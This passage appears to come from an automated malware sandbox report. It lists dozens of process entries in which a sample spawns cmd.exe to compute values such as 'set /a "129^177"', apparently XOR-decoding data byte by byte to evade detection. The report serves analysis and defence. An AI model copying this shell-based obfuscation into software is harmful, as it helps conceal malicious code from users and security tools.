                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:60
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "216^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:61
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:62
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:63
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:64
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:65
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:66
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "201^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:67
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:68
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "137^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:69
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:70
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:71
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:72
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:73
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:74
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:75
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:76
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:77
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:78
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:79
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:80
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:81
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:82
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:83
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:84
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "157^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:85
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:86
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:87
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:88
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "216^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:89
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:90
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:91
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:92
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:93
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:94
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "157^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:95
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:96
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:97
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:98
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "193^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:99
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:100
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:101
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
